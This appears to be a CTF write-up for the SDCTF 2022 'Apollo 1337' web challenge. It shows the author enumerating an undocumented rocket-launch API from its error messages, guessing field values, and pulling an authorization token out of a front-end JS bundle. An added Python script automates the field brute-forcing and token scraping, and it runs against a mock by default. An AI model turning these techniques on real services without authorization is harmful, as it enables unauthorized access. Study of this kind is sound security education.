NSS [SDCTF 2022]Apollo 1337
Category: a "for fun" challenge, but it still needs solid web fundamentals or you won't follow what is going on.
Challenge description: Hey there intern! We have a rocket launch scheduled for noon today and the launch interface is down. You'll need to directly use the API to launch the rocket. No, we don't have any documentation. And quickly, our shareholders are watching!
Opening the challenge returns an HTTP 500 straight away. The two boxes on the page say that the frontend page failed to render, and that all routes are running normally.
There is nothing useful in the page source, it is all JS bundles. Open the Network tab and you can see the page GETs an API endpoint.
The challenge description also mentions the API, so that is the place to start. Give the parameter a value and request it; the response reports the status of the rocket's other components, i.e. the other endpoints.
/api/status?verbose=xxx
There are three endpoints: /status, /rocketLaunch and /fuel. /status and /fuel return normal data; only /rocketLaunch returns something abnormal. (Prefix /api when requesting them, e.g. /api/status.)
At this point I switched to Postman; HackBar is no longer enough for this.
Sending an empty JSON body returns rocket not specified.
Define a rocket name (I named it the Jay17 rocket, to carry you safely to heaven). That returns rocket not recognized (available: triton), so the rocket name must be triton.
Next it returns launchTime not specified, so we specify a launch time. The description says the rocket is scheduled to launch at noon today; taking "noon" as 11 to 13 o'clock and trying values one by one, the launch time is 12:00.
Then it returns fuel pumpID not specified, so we define a pumpID. Looking at the /fuel route, the pump IDs range from 0 to 5; trying them one by one, 4 is the right one.
Then it returns frontend authorization token not specified, so we need a token. This one can't be guessed one by one; it has to be found somewhere, and it finally turns up in the index-309102b69640b6f8aef0.js bundle: yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ
payload:
{"rocket":"triton","launchTime":"12:00","pumpID":4,"token":"yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ"}
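The same field-by-field discovery, scripted, as an added example (not the challenge's or the author's code). It treats each validation error as a hint about the next required field, brute-forces the small launchTime and pumpID spaces, and pulls token candidates out of the JS bundle with a regex. The HTTP method (POST), the 400 status and {"error": "..."} shape of the error responses, the wording of the errors for wrong (rather than missing) values, and the 40-character alphanumeric token pattern are all assumptions; the offline mock_sender and SAMPLE_BUNDLE are constructed from the messages quoted above so the script runs without the target.

```python
"""Feel out an undocumented JSON endpoint from its own validation errors."""
import json
import re
import urllib.error
import urllib.request

ROCKET_LAUNCH = "/api/rocketLaunch"
# "noon" read as 11:00-13:00, on the hour and half hour (assumed granularity)
LAUNCH_TIMES = [f"{h:02d}:{m:02d}" for h in (11, 12, 13) for m in (0, 30)]
PUMP_IDS = list(range(6))                     # /fuel lists pumps 0-5
TOKEN_RE = re.compile(r"[A-Za-z0-9]{40}")     # assumption: token is 40 alphanumerics
AVAILABLE_RE = re.compile(r"available:\s*([^)]+)\)")


def extract_token_candidates(js_source):
    """Collect 40-character alphanumeric literals from a JS bundle."""
    return sorted(set(TOKEN_RE.findall(js_source)))


def http_sender(base_url):
    """Build send(payload) -> (status, body_text) for a live target (POST assumed)."""
    def send(payload):
        req = urllib.request.Request(
            base_url + ROCKET_LAUNCH, data=json.dumps(payload).encode(),
            headers={"Content-Type": "application/json"}, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, resp.read().decode()
        except urllib.error.HTTPError as exc:
            return exc.code, exc.read().decode()
    return send


def resolve_field(payload, field, candidates, send):
    """First candidate for which the server stops complaining about `field`.

    Heuristic: a validation error names the field it rejects, so once the
    error no longer mentions `field` (or the call succeeds) the value passed
    and the server has moved on to its next check."""
    for value in candidates:
        status, body = send(dict(payload, **{field: value}))
        if status < 500 and field.lower() not in body.lower():
            return value
    return None


def discover_payload(send, token_candidates):
    """Rebuild the launch payload one field at a time from the error messages."""
    status, body = send({})
    if "rocket not specified" not in body:
        raise RuntimeError(f"unexpected first response: {status} {body}")
    _, body = send({"rocket": "Jay17"})   # any bogus name makes it list what it accepts
    match = AVAILABLE_RE.search(body)
    rockets = [r.strip() for r in match.group(1).split(",")] if match else []

    payload = {}
    for field, candidates in (("rocket", rockets), ("launchTime", LAUNCH_TIMES),
                              ("pumpID", PUMP_IDS), ("token", token_candidates)):
        value = resolve_field(payload, field, candidates, send)
        if value is None:
            raise RuntimeError(f"no accepted value for {field} among {candidates}")
        payload[field] = value
    return payload


# --- offline stand-in for the real endpoint (constructed) --------------------
TOKEN = "yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ"
# Constructed bundle fragment; the real index-309102b69640b6f8aef0.js differs.
SAMPLE_BUNDLE = 'var c={api:"/api/status",auth:"' + TOKEN + '"};'


def mock_sender(payload):
    """Replays the writeup's validation errors in the order they appeared."""
    def err(msg):
        return 400, json.dumps({"error": msg})      # status and shape assumed
    if "rocket" not in payload:
        return err("rocket not specified")
    if payload["rocket"] != "triton":
        return err("rocket not recognized (available: triton)")
    if "launchTime" not in payload:
        return err("launchTime not specified")
    if payload["launchTime"] != "12:00":
        return err("launchTime not valid")          # wording assumed
    if "pumpID" not in payload:
        return err("fuel pumpID not specified")
    if payload["pumpID"] != 4:
        return err("fuel pumpID not valid")         # wording assumed
    if "token" not in payload:
        return err("frontend authorization token not specified")
    if payload["token"] != TOKEN:
        return err("frontend authorization token invalid")  # wording assumed
    return 200, json.dumps({"status": "launched"})


if __name__ == "__main__":
    # Swap mock_sender for http_sender("http://target") to run it against the real API.
    print(discover_payload(mock_sender, extract_token_candidates(SAMPLE_BUNDLE)))
```

The "field no longer named in the error" heuristic is what makes the loop generic: it never needs to know the exact error strings, only that the server's checks run in a fixed order and name the field they reject. If a target returns the same generic error for every failure, resolve_field will accept the first candidate, so confirm the final payload actually changes the response before trusting it.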